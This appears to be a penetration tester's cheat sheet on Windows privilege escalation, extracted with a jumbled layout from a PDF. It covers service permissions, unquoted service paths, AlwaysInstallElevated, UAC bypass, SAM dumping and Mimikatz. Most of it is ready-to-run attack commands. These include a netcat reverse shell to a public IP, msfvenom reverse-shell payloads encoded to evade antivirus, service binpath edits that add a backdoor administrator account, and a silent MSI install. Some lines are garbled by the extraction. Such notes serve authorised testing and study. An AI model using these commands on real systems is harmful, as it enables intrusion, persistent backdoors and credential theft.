DLL Search Order

1. The directory from which the application loaded

2. The Windows 32bit System directory (C:\Windows\System32) 3. The Windows 16bit System directory
(C:\Windows\System) 4. The Windows directory (C:\Windows)
5. The current working directory (CWD)
6. The directories in the System PATH variable
7. The directories in the User PATH variable

The following image highlights Java JDKs binary directory that is contained in the Systems
PATH variable:

If a service binary is located in such a directory any authenticated user can overwrite the binary
or the service DLLs, escalating their privileges. The following output shows the default
permissions Windows assigns to a newly created directory called DangerousService under the
C:\ drive on a Windows Server 2008 R2 system.

On some windows version the output will be like below

cacls Inherited Permissions

OI - Object inherit - This folder and files. (no inheritance to subfolders)
CI - Container inherit - This folder and subfolders.
IO - Inherit only
- The ACE does not apply to the current file/directory
ID - Inherited
- The ACE was inherited from the parent directory's ACL.
#These can be combined as folllows:
(OI)(CI)
This folder, subfolders, and files.
(OI)(CI)(IO) Subfolders and files only.
(CI)(IO) Subfolders only.
(OI) (IO) Files only.

icacls inherited Permissions

permission is a permission mask and can be specified in one of two forms:
a sequence of simple rights:
D - Delete access
F - Full access
N - No access
M - Modify access
RX - Read and eXecute access
R - Read-only access
W - Write-only access
a comma-separated list in parenthesis of specific rights:
DE - Delete
RC - read control
WDAC - write DAC
WO - write owner

S - synchronize
AS - access system security
MA - maximum allowed
GR - generic read
GW - generic write
GE - generic execute
GA - generic all
RD - read data/list directory
WD - write data/add file
AD - append data/add subdirectory
REA - read extended attributes
WEA - write extended attributes
X - execute/traverse
DC - delete child
RA - read attributes
WA - write attributes
inheritance rights can precede either form and are applied
only to directories:
(OI) - object inherit
(CI) - container inherit
(IO) - inherit only
(NP) - dont propagate inherit
(I) - Permission inherited from parent container

Accesschk
WindowsPrivEsc.ppt
Tools
PsInfo.exe
Psexec to execute as different user
Weak Service Exploitation
#list all services
wmic service list brief
#list all services binary path
wmic service list config
#compile list of services
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v
"system32"') do @echo %a >> permissions.txt
for /f eol^=^"^ delims^=^" %a in (permissions.txt) do cmd.exe /c icacls "%a"
#wmic to start service
C:\Users\homerwmic service ose call startservice

#Migrate to another pid

wmic process list brief | find "winlogon"
#LFI Blind
C:\WINDOWS\system32\eula.txt

Windows_Services_-_All_roads_lead_to_SYSTEM.pdf
Windows Privilege Checker
windows-privesc-check2.exe audit -a -o result
Check Schtasks
schtasks /query /fo LIST /v
if there is any task running as system

WINDOWS ESCALATE SERVICE PERMISSIONS LOCAL PRIVILEGE ESCALATION

use exploit/windows/local/service_permissions
KITRAP0D
https://www.rapid7.com/db/modules/exploit/windows/local/ms10_015_kitrap0d

Cacls or Icacls
Perm is a permission mask that can be specified in one of the following forms:
A sequence of simple rights:
F (full access)
M (modify access)
RX (read and execute access)
R (read-only access)
W (write-only access)
A comma-separated list in parenthesis of specific rights:
D (delete)
RC (read control)
WDAC (write DAC)
WO (write owner)
S (synchronize)
AS (access system security)
MA (maximum allowed)
GR (generic read)
GW (generic write)
GE (generic execute)
GA (generic all)
RD (read data/list directory)
WD (write data/add file)
AD (append data/add subdirectory)

REA (read extended attributes)

WEA (write extended attributes)
X (execute/traverse)
DC (delete child)
RA (read attributes)
WA (write attributes)
Inheritance rights may precede either Perm form, and they are applied only to directories:
(OI): object inherit
(CI): container inherit
(IO): inherit only
(NP): do not propagate inherit

FILE_APPEND_DATA
Getsystem
if fail
run post/windows/manage/migrate
and try again
Download file using powershell
echo (New-Object
System.Net.WebClient).DownloadFile("https://i.ytimg.com/vi/ndsaoMFz9J4/maxresdefault.jpg",
".\cat.jpg") >> meow.ps1
&powershell -ExecutionPolicy ByPass -File meow.ps1
netcat nc remote shell
&nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
netcat nc host remote shell
nc -lv -p 13337
Virtual box to public ip
set network settings to bridged
port forwarding on modem
upgrading shell to meterpreter-shell
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
nc64.exe -nv 54.169.207.161 13337 -e cmd.exe
sessions -u [id]
upgrading 32-bit shell to 64-bit meterperter shel
use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp
nmap examples
nmap -sT -A -PO [IP addr]

how to compile a payload

./msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=54.251.141.181 LPORT=13337 R
-f psh -o meow.exe
priv escalate using bypassuac
use exploit/windows/local/bypassuac
Service Binaries [11]
Windows Service Trusted Path
#run this to exloit file name parameter is being handled
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v
"C:\Windows\\" |findstr /i /v """
#check if user is allowed to write/run service
icacls C:\Program Files\sample"
#create payload
./msfvenom -p windows/meterpreter/reverse_https -e x86/shikata_ga_nai lhost=54.251.141.181
lport=8885 -f exe -o Mail.exe
#restart service
sc stop [service]
sc start [service]
Windows Binaries [11]
#download Accesschk which is to allow for advanced querying, managing and troubleshooting
of systems and applications.
#check which services can be modified by any authenticated user
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
#check configuration of the service
sc qc PFNET
#add new user to local administrator group
sc config PFNET binpath= "net user rottenadmin P@ssword123! /add"
sc stop PFNET
sc start PFNET
sc config PFNET binpath= "net localgroup Administrators rottenadmin /add"
sc stop PFNET
sc start PFNET
AlwaysInstallElevated [11]
AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft
Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.
#run registry query to check policy
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
#generate a new payload that will add a new user
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o rotten.msi

#run installer at background on stealth mode

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\rotten.msi
Unattended Install
Unattended installation is an automated installation technology in Microsoft Windows Server
2003 that you can use to install or upgrade an operating system with minimal user intervention.
#check if theres unattended xml
C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\System32\
C:\Windows\System32\sysprep\
Dumping SAM FIle
#This is to dump the security account manager password in LM hashes whereby password are
authenticate by hashes
gsecdump
fgdump
hobocopy
Weak permissions on Processes
Inject processes http://www.tarasco.org/security/Process_Injector/
Sensitive information stored in shared folders
using tool like (auxiliary/scanner/smb/smb_enumshares)
Mimikatz
This is to retrieve password from memory since
migrate pid
load mimikatz
wdigest
What payload do you want to generate:
Name:
-----

Description:
------------

1. Windows Shell Reverse_TCP

Windows Command Shell, Reverse TCP Stager
2. Windows Reverse_TCP Meterpreter
Windows Meterpreter (Reflective Injection),
Reverse TCP Stager
3. Windows Reverse_TCP VNC DLL
VNC Server (Reflective Injection), Reverse
TCP Stager
4. Windows Bind Shell
Windows Command Shell, Bind TCP Stager
5. Windows Bind Shell X64
Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64
Reverse TCP Stager

Windows x64 Command Shell, Windows x64

7. Windows Meterpreter Reverse_TCP X64

Reverse TCP Stager
8. Windows Meterpreter Reverse HTTPS
Reverse HTTPS Stager
9. Windows Meterpreter Reverse DNS
Reverse TCP Stager (DNS)

Windows x64 Meterpreter, Windows x64

Windows Meterpreter (Reflective Injection),
Windows Meterpreter (Reflective Injection),

Enter number: 2
What encoder would you like to try and bypass AV with.
Name:
----1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
171.248.151.85:13337

Reference

Description:
----------Avoid UTF8/tolower
Polymorphic XOR Additive Feedback Encoder
Alpha2 Alphanumeric Mixedcase Encoder
Alpha2 Alphanumeric Uppercase Encoder
Call+4 Dword XOR Encoder
Single-byte XOR Countdown Encoder
Variable-length Fnstenv/mov Dword XOR Encoder
Jump/Call XOR Additive Feedback Encoder
Non-Alpha Encoder
Non-Upper Encoder
Alpha2 Alphanumeric Unicode Mixedcase Encoder
Alpha2 Alphanumeric Unicode Uppercase Encoder

1. http://www.fuzzysecurity.com/tutorials/16.html
2. http://infosecluke.blogspot.com/2013/05/from-netcat-nc-to-meterpreter-shell.html
3. https://www.youtube.com/watch?v=j0L91QmAvVE
4. https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-MetasploitDevelopment-Environment
5. https://sathisharthars.wordpress.com/2014/06/19/bypass-uac-and-get-admin-privilege-inwindows-7-using-metasploit/
6. https://laharisi.wordpress.com/2011/04/07/privilege-escalation-windows-uac-bypass/
7. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-ProtectionBypass-In-Memory-Injection.html
8. https://packetstormsecurity.com/files/125544/Windows-Escalate-UAC-ProtectionBypass-In-Memory-Injection.html
9. http://netsec.ws/?p=331
10. http://hatriot.github.io/blog/2014/03/10/meterpreter-shell-upgrades-using-powershell/
11. http://toshellandback.com/2015/11/24/ms-priv-esc/